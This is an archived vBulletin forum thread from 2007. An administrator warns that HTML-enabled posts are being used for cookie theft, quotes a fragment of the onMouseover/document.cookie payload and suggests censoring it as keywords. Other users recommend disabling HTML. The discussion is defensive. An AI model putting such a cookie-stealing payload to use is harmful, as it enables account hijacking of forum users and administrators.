vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   Community Lounge (https://vborg.vbsupport.ru/forumdisplay.php?f=13)
-   -   vBulletin Forums and User Accounts being exploited (https://vborg.vbsupport.ru/showthread.php?t=146395)

GoTTi 05-03-2007 06:27 PM

vBulletin Forums and User Accounts being exploited
 
vbulletin staff please send out a security bulletin regarding this issue.

What is happening:
A user is posting a thread or reply with a image that on mouseover, records the users cookie onto a .php file page, which is printing out the data to a .txt file. The data being recorded is the cookie information of the user mousing over the image. When the user does the mouseover on the image, the image will disappear, when that happens, the cookie information is recorded to the external site.

This makes it easy for someone to login as another user, including admins. all the exploiter has to do is edit their cookie file, save it, and visit the site and they are logged in as the user. Admins need to be careful....

This has happened to only 2 forums i know of right now, including mine.

After reading the code in the thread that the user posted, its being done using HTML. now, we are always told to disable HTML on our forums, but LOTS of people use it because its a handy tool for users on our forums to play with.

so i guess the only fix, besides disabling the HTML on your forums, is to censor out these keywords that are needed for the recording of the cookie data:

Quote:

onMouseover="document.sam.src=
+document.cookie;">
i believe censoring out these keywords will work and help protect our forums


Note: im not sure if "document.sam.src=" is needed to be censored. i think just censoring onMouseover is good enough...

EnIgMa1234 05-03-2007 06:40 PM

eh thats why vbulletin asks you not to enable html. simple solution reallly

nexialys 05-03-2007 06:52 PM

like Enigma just said... most forum softwares now disable HTML in posts...

so if you've been fool enough to activate it on a large public website, you now learn your lesson.

Distance 05-03-2007 07:19 PM

Enabling HTML is a foolish thing to do.

GoTTi 05-03-2007 08:03 PM

where is the option to enable or disable html in the admincp anyways?

rjmjr69 05-03-2007 08:09 PM

Interesting cause this is also happening with MySpace..........

kall 05-03-2007 10:05 PM

Quote:

Originally Posted by GoTTi (Post 1240828)
where is the option to enable or disable html in the admincp anyways?

It's a per-forum setting.

Unless you have installed my modification which makes it a per-usergroup setting.

Anyone who has enabled that for non-admins is a tad on the silly side, IMO.

Ntfu2 05-04-2007 04:00 AM

Quote:

Originally Posted by kall (Post 1240910)

Anyone who has enabled that for non-admins is a tad on the silly side, IMO.

Must have to be nice :D


Personally, i think your flippin crazy to have it enabled any where.

kall 05-04-2007 04:20 AM

Quote:

Originally Posted by Ntfu2 (Post 1241082)
Must have to be nice :D


Personally, i think your flippin crazy to have it enabled any where.

Well, true.

There is the odd time where I totally forget, and post dodgy cookie-stealing code on my site. :p


All times are GMT. The time now is 09:18 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01866 seconds
  • Memory Usage 1,726KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (4)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (9)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 

Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete